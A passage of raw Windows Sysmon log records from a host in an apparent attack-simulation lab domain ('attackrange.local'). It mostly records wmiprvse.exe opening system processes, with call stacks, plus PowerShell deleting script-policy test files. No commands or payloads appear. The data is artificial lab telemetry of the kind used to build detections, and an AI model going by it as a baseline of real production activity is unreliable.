ystem32\RPCRT4.dll+111bc 10341000x80000000000000002242218Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242217Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002242216Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.623{05ADC7E1-6DD2-603E-CCAA-00000000AD01}14264ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_ofahnijf.yu4.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002242215Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242214Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.608{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242213Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.608{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242212Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.608{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242211Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.608{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002242210Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.608{05ADC7E1-6DD2-603E-CCAA-00000000AD01}14264ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_ra2dcuty.0q4.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002242209Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.608{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242208Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.608{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242207Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.608{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242206Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.608{05ADC7E1-229F-6039-1600-00000000AD01}154010492C:\Windows\system32\svchost.exe{05ADC7E1-6DD2-603E-CFAA-00000000AD01}13372C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242205Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.608{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242204Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.608{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6DD2-603E-CFAA-00000000AD01}13372C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242203Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.608{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242202Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.608{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242201Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.608{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242200Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.608{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242199Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.608{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242198Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.608{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242197Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.608{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242196Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 